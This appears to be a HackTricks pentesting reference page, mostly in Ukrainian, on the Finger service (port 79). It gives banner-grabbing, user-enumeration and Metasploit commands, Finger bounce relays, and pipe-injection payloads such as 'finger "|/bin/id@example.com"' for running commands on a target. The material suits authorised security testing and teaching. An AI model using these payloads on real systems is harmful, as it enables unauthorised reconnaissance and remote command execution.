79 - Pentesting Finger

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Миттєво доступна установка для оцінки вразливостей та тестування на проникнення. Запустіть повний pentest з будь-якого місця з 20+ інструментами та функціями, які охоплюють від розвідки до звітування. Ми не замінюємо pentester'ів - ми розробляємо спеціалізовані інструменти, модулі виявлення та експлуатації, щоб повернути їм трохи часу для глибшого аналізу, отримання доступу та розваг.

Основна інформація

Програма/сервіс Finger використовується для отримання деталей про комп'ютерних користувачів. Зазвичай надається інформація, яка включає ім'я користувача, повне ім'я та, в деяких випадках, додаткові деталі. Ці додаткові деталі можуть включати місцезнаходження офісу та номер телефону (якщо доступно), час входу користувача, період бездіяльності (idle time), останній раз, коли користувач читав електронну пошту, та вміст файлів планів і проектів користувача.

Порт за замовчуванням: 79

PORT   STATE SERVICE
79/tcp open  finger

Перерахунок

Отримання банера/Базове з'єднання

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Перерахування користувачів

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Альтернативно, ви можете використовувати finger-user-enum від pentestmonkey, кілька прикладів:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap виконує скрипт для використання стандартних скриптів

Metasploit використовує більше трюків, ніж Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Виконання команд

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Використовуйте систему як реле finger

finger user@host@victim
finger @internal@external

Миттєво доступна налаштування для оцінки вразливостей та пенетестації. Запустіть повний пенетест з будь-якого місця з 20+ інструментами та функціями, які охоплюють від розвідки до звітування. Ми не замінюємо пенетестерів - ми розробляємо кастомні інструменти, модулі виявлення та експлуатації, щоб повернути їм трохи часу для глибшого аналізу, отримання доступу та розваг.

Вчіться та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Вчіться та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Last updated